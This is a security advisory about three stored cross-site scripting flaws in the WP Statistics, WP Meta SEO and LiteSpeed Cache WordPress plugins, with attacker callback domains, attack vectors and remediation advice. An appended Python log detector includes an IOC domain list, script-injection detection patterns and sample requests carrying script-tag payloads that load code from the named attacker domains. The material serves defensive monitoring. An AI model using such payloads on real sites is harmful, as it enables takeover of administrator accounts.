Critical WordPress Plugin Vulnerabilities Expose Over 6 Million Sites to Exploitation

June 4, 2024

CVE or Exploit Name

CVE-2024-2194 (CVSS 7.2): The first bug affects WP Statistics, which has more than 600,000 installations. The WP Statistics plugin for WordPress is vulnerable to stored cross-site scripting, making it possible for unauthenticated attackers to inject arbitrary web scripts into pages that will execute whenever a user accesses an injected page.

CVE-2023-6961 (CVSS 7.2): The second bug hits the WP Meta SEO plugin, which has more than 20,000 installations. It involves improper neutralization of input during web page generation, leading to cross-site scripting.

CVE-2023-40000 (CVSS 8.3): The third bug hits the LiteSpeed Cache plugin, which has over 5 million installations, and likewise involves improper neutralization of input during web page generation ("Cross-site Scripting").

Timeline

May 29, 2024: NIST reports an update on CVE-2024-2194
May 29, 2024: Both MITRE and NIST report updates on CVE-2023-6961
May 29, 2024: NIST reports an update on CVE-2023-40000

Overview of Exploit

Three high-severity WordPress plugin vulnerabilities, CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, are susceptible to unauthenticated cross-site scripting (XSS) attacks. These vulnerabilities pose a significant risk, enabling attackers to inject malicious scripts through popular WordPress plugins and potentially impacting almost 6 million WordPress installations.

Impact

Fastly reported that exploitation of CVE-2024-2194 has been associated with the domain media.cdnstaticjs[.]com. Most attacks targeting this vulnerability come from 17 distinct IP addresses in AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a notable concentration of attack sources in the Netherlands.

Figure: CVE-2024-2194 exploitation

Exploitation of CVE-2023-6961 can be correlated with the domain idc.cloudiync[.]com. A single IP address in AS202425 (IP Volume Inc.) has made over 5 billion exploit attempts targeting this vulnerability. Since May 16th, media.cdnstaticjs[.]com has been used to launch attack payloads against this vulnerability; interestingly, this domain is also linked to attacks targeting CVE-2024-2194.

Figure: CVE-2024-2194 exploitation

Unlike the other vulnerabilities, Fastly reported that exploitation of CVE-2023-40000 is associated with the domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com. The most recent attack involving cdn.mediajsdelivery[.]com was observed on April 15th.

Figure: CVE-2023-40000 exploitation

Why Is This Important?

These vulnerabilities matter because of WordPress's widespread popularity and the staggering frequency of attacks targeting the platform. According to a report from WebTribunal, WordPress faces an astonishing 90,000 attacks per minute. Such a relentless onslaught underscores the critical need for robust security measures. Failure to regularly update WordPress leaves websites highly vulnerable to exploitation. Alarmingly, nearly 61% of attacked sites were found to be outdated, indicating that many website owners neglect crucial security updates.

The vulnerabilities CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 add further urgency to this situation. SC Media reported that WP Statistics, affected by CVE-2024-2194, has over 600,000 installations, making it a prime target for exploitation. Similarly, CVE-2023-6961 affects the WP Meta SEO plugin, which, despite a smaller user base of over 20,000 installations, still presents a significant risk given the potential impact on website metadata and SEO performance. Moreover, the LiteSpeed Cache plugin, affected by CVE-2023-40000 and used by over 5 million installations, highlights the widespread reliance on WordPress plugins and the urgent need to address vulnerabilities to safeguard against attacks.
Implications

The consequences of these vulnerabilities are significant and widespread, exacerbated by the alarming rate at which they are exploited. Each vulnerability presents immediate risks to individual websites, including the potential for unauthorized access, data breaches, and website defacement. CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 all pose serious threats, compromising the trustworthiness of websites and leaving sensitive user logins and data vulnerable to theft or manipulation.

The widespread usage of WordPress plugins means that vulnerabilities can be exploited to launch large-scale attacks. Exploitation of these vulnerabilities by cybercriminals can disrupt services, compromise business operations, and facilitate the spread of malware or ransomware. The exploitation attempts, numbering in the billions for some vulnerabilities, highlight the severity and persistence of the threat landscape.

How it works

Fastly reported that CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 in WordPress plugins give attackers the opportunity to exploit websites through unauthenticated stored cross-site scripting (XSS). Here is how each vulnerability can be exploited:

CVE-2024-2194: This vulnerability affects the WP Statistics plugin (version 14.5 and earlier) and allows attackers to inject malicious scripts via the URL search parameter. Specifically, attackers can inject a script tag that points to an obfuscated JavaScript file hosted on an external domain. When a user accesses an infected page, the injected script executes, enabling attackers to perform malicious actions such as creating new administrator accounts, injecting backdoors, and setting up tracking scripts.

CVE-2023-6961: The vulnerability in the WP Meta SEO plugin (version 4.5.12 and earlier) involves stored cross-site scripting through the Referer HTTP header. Attackers can send a payload to a target site which, when visited by an administrator, leads to the execution of obfuscated JavaScript from a callback domain. The attack targets pages that generate 404 responses and can result in the victim's credentials being used for further malicious activity.

CVE-2023-40000: The LiteSpeed Cache WordPress plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through certain parameters. When an admin accesses any backend page, an XSS payload disguised as an admin notification is executed, potentially leading to subsequent malicious actions using the admin's credentials.

In short, these vulnerabilities allow attackers to inject and execute malicious scripts that enable activities such as creating unauthorized accounts, injecting backdoors, and tracking site activity.

Recommendations & Remediation

For CVE-2023-40000 and the similar vulnerabilities CVE-2024-2194 and CVE-2023-6961, Wordfence reported that patches are available. Within plugins, input sanitization measures can validate and sanitize user input, preventing the execution of malicious scripts and mitigating the risk of stored cross-site scripting. Routine security audits of WordPress plugins can proactively identify and address vulnerabilities before attackers exploit them. Educating administrators and users about security best practices, such as avoiding suspicious links and being cautious when accessing administrative pages, is also essential. Implementing Content Security Policy (CSP) headers can further mitigate the impact of cross-site scripting by restricting the sources from which a web page may load resources. Lastly, establishing strong monitoring to detect security incidents promptly is indispensable.

About BreachLock

BreachLock is a global leader in Continuous Attack Surface Discovery and Penetration Testing.
Continuously discover, prioritize, and mitigate exposures with evidence-backed Attack Surface Management, Penetration Testing, and Red Teaming. Elevate your defense strategy with an attacker's view that goes beyond common vulnerabilities and exposures. Each risk we uncover is backed by validated evidence. We test your entire attack surface and help you mitigate your next cyber breach before it occurs. Know Your Risk. Contact BreachLock today!
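The two injection vectors described under "How it works" (script markup in the URL search parameter for WP Statistics, and in the Referer header for WP Meta SEO) and the monitoring recommendation above, as an added detection example that is not BreachLock's, Fastly's or any plugin's code: it scans a constructed, simplified access-log format (method, path, quoted Referer, source IP; an assumption, not a real server format) for requests that carry script markup in a query parameter or the Referer header, or that reference the callback domains named in this advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Callback domains this advisory associates with exploitation (defanged on the page).
IOC_DOMAINS = sorted({
    "media.cdnstaticjs.com", "idc.cloudiync.com", "cloud.cdndynamic.com",
    "go.kcloudinc.com", "cdn.mediajsdelivery.com",
})
# Markers of injected script in a decoded value: a script tag, a javascript: URL, or an inline event handler.
SCRIPT_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Constructed, simplified log format (an assumption, not a real server format): METHOD PATH "REFERER" SRC_IP
LOG_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+)$')

def flag_request(path, referer):
    """Return the reasons a request matches one of the advisory's XSS vectors."""
    reasons = []
    # WP Statistics vector: script markup arriving in a query parameter (parse_qsl URL-decodes values).
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if SCRIPT_RE.search(value):
            reasons.append(f"script in query parameter '{name}'")
    # WP Meta SEO vector: script markup arriving in the Referer header.
    if SCRIPT_RE.search(unquote(referer)):
        reasons.append("script in Referer header")
    # Either vector: a reference to a known callback domain anywhere in the request.
    decoded = (unquote(path) + " " + unquote(referer)).lower()
    for domain in IOC_DOMAINS:
        if domain in decoded:
            reasons.append(f"reference to callback domain {domain}")
    return reasons

def scan_log(lines):
    """Scan log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # skip lines that do not fit the constructed format
        _method, path, referer, src = match.groups()
        reasons = flag_request(path, referer)
        if reasons:
            hits.append({"src": src, "path": path, "reasons": reasons})
    return hits

# Constructed sample traffic: one request per vector plus one benign search request.
SAMPLE_LOG = [
    'GET /?s=%3Cscript+src%3D%22https%3A%2F%2Fmedia.cdnstaticjs.com%2Fstat.js%22%3E%3C%2Fscript%3E "-" 203.0.113.10',
    'GET /does-not-exist "<script src=https://idc.cloudiync.com/x.js></script>" 198.51.100.7',
    'GET /?s=wordpress+security "https://example.org/" 192.0.2.5',
]
```

Running scan_log(SAMPLE_LOG) flags the first two constructed requests and leaves the benign search untouched; adapting LOG_RE to a real access-log format is the only change needed for production logs.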